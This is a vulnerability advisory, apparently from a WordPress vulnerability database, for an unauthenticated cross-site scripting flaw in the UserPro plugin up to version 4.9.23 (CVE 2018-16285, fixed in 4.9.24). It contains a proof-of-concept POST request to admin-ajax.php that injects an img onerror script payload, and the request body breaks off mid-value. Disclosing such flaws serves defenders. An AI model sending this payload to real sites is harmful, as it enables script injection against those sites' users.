UserPro <= 4.9.23 - Unauthenticated Cross-Site Scripting (XSS)



Description
An XSS vulnerability that affects from version 2.13 to 4.9.23.
Proof of Concept
POST /wp-admin/admin-ajax.php
Host: domain.com

action=userpro_shortcode_template&shortcode=[userpro<img src=a onerror=alert(1)> id=1 layout="float" collage_per_page="20" emd_paginate_top="1" emd_paginate="1" emd_gender="Gender,radi

Affects Plugin

fixed in version 4.9.24

References

CVE 2018-16285
URL https://risataim.blogspot.com/2018/09/xss-en-plugin-userpro-de-wordpress.html
URL https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681
URL https://userproplugin.com/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Yonatan_correa
Submitter Website https://risataim.blogspot.com
Submitter Twitter Yonatan_correa
Views 7350
Verified No
WPVDB ID 9124

Timeline

Publicly Published 2018-08-31 (about 1 year ago)
Added 2018-09-07 (about 1 year ago)
Last Updated 2018-09-14 (about 1 year ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin